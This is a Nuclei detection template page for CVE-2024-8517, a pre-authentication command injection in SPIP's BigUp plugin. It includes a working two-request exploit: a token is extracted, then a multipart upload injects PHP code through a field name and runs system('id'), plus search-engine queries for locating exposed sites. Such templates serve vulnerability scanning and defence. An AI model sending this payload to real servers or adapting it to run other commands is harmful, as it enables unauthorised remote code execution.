SPIP BigUp Plugin - Remote Code Execution
ID: CVE-2024-8517
Severity: critical
Author: DhiyaneshDk
Tags: cve,cve2024,intrusive,spip,rce
Description
Section titled “Description”SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
YAML Source
Section titled “YAML Source”id: CVE-2024-8517
info: name: SPIP BigUp Plugin - Remote Code Execution author: DhiyaneshDk severity: critical description: | SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request. reference: - https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/ - https://vulncheck.com/advisories/spip-upload-rce - https://github.com/fkie-cad/nvd-json-data-feeds - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-8517 cwe-id: CWE-646 epss-score: 0.00045 epss-percentile: 0.16322 metadata: verified: true max-request: 2 shodan-query: http.favicon.hash:-1224668706 fofa-query: "X-Spip-Cache" tags: cve,cve2024,intrusive,spip,rce
flow: http(1) && http(2)
variables: email: "{{randstr}}@{{rand_base(5)}}.com" string: "{{randstr}}" filename: "{{to_lower(rand_text_alpha(5))}}"
http: - raw: - | GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - 'formulaire_action_args' - 'spip' condition: and internal: true
extractors: - type: regex part: body group: 1 name: formulaire regex: - name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"] internal: true
- raw: - | POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586
--5f02b65945d644d6a32847ab130e9586 Content-Disposition: form-data; name="page"
spip_pass --5f02b65945d644d6a32847ab130e9586 Content-Disposition: form-data; name="lang"
fr --5f02b65945d644d6a32847ab130e9586 Content-Disposition: form-data; name="formulaire_action"
oubli --5f02b65945d644d6a32847ab130e9586 Content-Disposition: form-data; name="formulaire_action_args"
{{formulaire}} --5f02b65945d644d6a32847ab130e9586 Content-Disposition: form-data; name="formulaire_action_sign"
--5f02b65945d644d6a32847ab130e9586 Content-Disposition: form-data; name="oubli"
{{email}} --5f02b65945d644d6a32847ab130e9586 Content-Disposition: form-data; name="nobot"
--5f02b65945d644d6a32847ab130e9586 Content-Disposition: form-data; name="bigup_retrouver_fichiers"
a --5f02b65945d644d6a32847ab130e9586 Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt" Content-Type: text/plain
{{string}} --5f02b65945d644d6a32847ab130e9586--
matchers-condition: and matchers: - type: regex part: body regex: - "uid=[0-9]+.*gid=[0-9]+.*"
- type: status status: - 200# digest: 490a0046304402204acc12d80dce8864c38de5a73554c57e61410ef051489821a53d912a6c9cf83402206b71cdddaba20d5d11c02eeef22805bb7bb908168777555e0178b10df12ab08a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-8517.yaml"